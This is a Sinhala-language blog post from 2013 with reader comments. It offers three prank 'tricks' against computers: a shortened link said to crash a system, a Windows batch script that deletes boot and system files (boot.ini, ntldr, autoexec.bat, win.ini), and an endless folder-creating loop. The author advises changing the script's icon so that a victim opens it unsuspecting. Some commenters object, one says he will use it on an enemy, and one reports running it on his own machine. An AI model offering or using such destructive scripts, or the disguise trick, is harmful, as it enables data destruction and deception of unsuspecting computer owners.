Posted by : yasiru Sunday, July 14, 2013



1. URL එකකින් සිස්ටම් එක Crash කරමු.


 පහල තියන URL එක ක්ලික් කළා කියන්නේ ඇම කෑවා කියන එක තමයි. මේක ක්ලික් කරලා පැයක් හමාරක් යද්දී කම්පියුටර් එකේ මුළු සිස්ටම් එකටම බඩු හම්බ වෙනවා. ඉතින් තේරෙනවා නේද කරන්න ඕන වැඩේ. කාටහරි URL එකක් ක්ලික් කරවන එක මහා ලොකු වැඩක් නෙමෙයිනේ. ඔන්න එහෙනම් පහල තියනවා බඩු.

http://tiny.cc/ibJUN


2. පරිගණකයක් සදහටම නිදි කරවමු

මේකෙන් වෙන්නේ පරිගණකය Shut Down වෙලා Reboot වෙන්න ඕනා ෆයිල්ස් ටික මකලා පරිගණකය Restart වෙවී තියන එකයි. මේ පහල තියන ටෙක්ස්ට් ටික Notepad එකකට Paste කරලා මොකක්හරි නමක් දීලා අන්තිමට .bat කියලා දීලා සේව් කරන එකයි.



@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

ඒ ෆයිල් එකේ Icon එක එහෙම පොඩ්ඩක් වෙනස් කරලා කාටහරි දුන්නම සැක හිතන්නෙ නැහැ.තේරුනා නේද මොනවද කියන්නේ කියලා.. ;) ඊට පස්සේ දෙන්න කාටහරි Open කරන්න කියලා.




3. තත්පර කීපයකින් Folders 1000කට වඩා හදමු

මේක Rename කරන්න ඕන 1000folders.bat කියන විදිහට. පස්සේ ඉතින් පුළුවන් Shortcut එකක් එහෙම දාල නමයි Icon එකයි එහෙම වෙනස් කරගන්න. ඔන්න එහෙනම් පහල තියනවා කෝඩ් එක..

@echo off
:top
md %random%
goto top  

{ 11 අදහස්... read them below or Comment }

  1. මොකටද බං මල්ලියේ මෙව්වා

    ReplyDelete
  2. හෙහ් හේ.... යසිරු කිව්වා හින්දම මම ලින්ක් එක චෙක් කළා... :D

    කෝකටත් ලින්ක් එක අප්ඩේට් කරන්න... ඉන්ග්ලිෂ් සයිට් වලින් කොපි කල පමණින් දාන්න එපා.. චෙක් කරන්න පුළුවන් නම් ලොකු දෙකක් ;)

    කොහොම උනත් හොඳ උත්සාහයක් මල්ලි ... :)

    ReplyDelete
  3. මේ තාක් කාලයක් මං උඹ ගැන හොඳ පැහැදීමකින් හිටියේ. ඒත් ඒ අදහස අද අත ඇරියා මලයා. මේ විනාශකාරි දේවල් කියා දීමෙන් මොනවද ලැබෙන්නේ. කවුරු හෝ නසරානියෙක් අතට ගියොත් විනාසේ තමා.
    ඇත්තටම *රි වැඩ කියන්නේ මේවට

    ReplyDelete
  4. මේ පෝස්ට් එක මකපං මලයා. බොහොම දයාවෙන් ඉල්ලන ඉල්ලිමක්.

    ReplyDelete
  5. හොඳා හොඳා... ඕවා හදලා, යාලුවන්ගේ කම්පියුටර් ක්‍රෑෂ් කරලා උඩ පැනලා සන්තොස වෙන්න... පුළුවන් නම් තව ටිකක් වැඩි දියුණුත් කරගන්න...

    තාක්ෂණික දැනුම තියෙන ටික දෙනා පවා කරන්නේ මේ ටික තමයි ලංකාවේ තාමත්... ඒ දැනුම වැඩකට ඇති දේකට යොදවනවට වඩා මේ වගේ ආතල් ගැනීම තමයි ලොකුම දේ... නිකමට අර මධුර ඩික්ෂනරිය හදපු එකා වගේ, නැත්තං හන්තාන ලිනක්ස් කරන උන් ටික වගේ, එහෙමත් නැත්තං තව කෙනෙක්ට ප්‍රයෝජනයක් ගන්න පුලුවන් විදියට හදපු ඇප් එකක් ලෝකෙට ගේන්න උත්සාහ කරන්නේ බොහොම කීප දෙනයි... දවසකට කී ලක්ෂයක් සයිට්ස් වල අලුත් ඇප් හඳුන්වලා දෙනවද ඉංග්‍රීසි භාෂාවෙන්... ඉන්දියාව යන්තම් ගොඩ යනවා... අපේ උන් තාමත් වලටම බහිනවා....

    ReplyDelete
  6. ඔය කියන තරන් හානියක් වෙන්නේ නැහැ ... boot ini එක පේස්ට් කරාම වැඩේ ගොඩ.. link එක ක්ලික් කර පමනින්මත් සේරම ඉවර වෙන්නේ නැහැ බය නැතුව ක්ලික් කරල බලන්න ..

    ReplyDelete
  7. කලින් දවසකත් දැක්ක මෙහෙම එකක් කමෙන්ට් එකක් කොටලත් නොදා හිටිය. මේ යසිරු නෙමෙයිද මන්ද. හිට් බලාගෙන නම් මේක දැම්මෙ පජාතයි කියන්න වෙන්නෙ. අවබොදයක් නැතුව දැම්ම නම් දැන් වත් මකපං. අපි මේකට ආදරෙයි. ඒත් බලාපොරෙත්තු වෙන්නෙ මෙව්ව නෙමෙයි.

    ReplyDelete
  8. මගේ තරහා කාරයෙක් ඉන්නවා. මේ වගේ වයිරස් එකක් හදලා උට හුකෝලා ගන්නම් !
    තෑන්ක්ස් මල්ලි.
    කලින් එකත් ට්‍රයි කලා. ඒක වැඩ. තාම ගේම දුන්නේ නෑ.
    අම්මාපල්ල දෙනවා උට පුකෙන් දුං විසිවෙන්න !

    ReplyDelete
  9. machan mewwath apita ona wenawa.mewa pawochchi karana widiya anuwa thamai wenas wenne

    ReplyDelete
  10. ane budu ayye man ara nidikarawana virus eka copy karala file ekak haduwa
    mama gona wage eka open karanna baluwa. mala huttaparaya une...virus guard ekakwath na. eka open wela BLANK watenawa. virus eka activate wenna kochchara kal yaida ??????plzzzzz help me!!!

    ReplyDelete
    Replies
    1. hodama de thamai computer eka format karana eka

      Delete

Welcome

ඕහ්..තවම member කෙනෙක් වුණේ නැත්ද

▪ අලුත් විදියට හිතන්න 
▪ අලුත් දේ ඉගෙන ගන්න 
▪ අලුත් දේ කරන්න 
▪ අපිත් එක්ක එකතු වෙන්න 
▪ ඔයත් දැන්ම සාමාජිකයෙක් වෙන්න.

Followers

Sunday 7.30 a.m

Online සිංහයින්


- Copyright © සිංහPedia -SinHaPedia.com- Powered by SinHaPedia INC - Designed by Yasiru Udana Ransara -